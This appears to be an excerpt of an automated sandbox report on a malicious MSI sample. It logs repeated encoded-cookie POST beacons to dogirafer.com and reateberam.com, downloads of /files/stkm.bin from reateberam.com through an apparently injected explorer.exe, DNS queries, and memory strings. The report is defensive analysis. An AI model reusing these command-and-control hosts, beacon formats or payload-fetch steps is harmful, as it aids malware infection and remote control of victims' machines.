Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0137900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

9_2_0137900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000009.00000003.3114928879.00000000079D3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabH
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000002.4132205195.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4129592451.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2053182664.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe, 00000009.00000000.2052116683.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000009.00000000.2056295568.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000000.2051282455.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618653369.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4126668023.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462615856.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3115088223.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
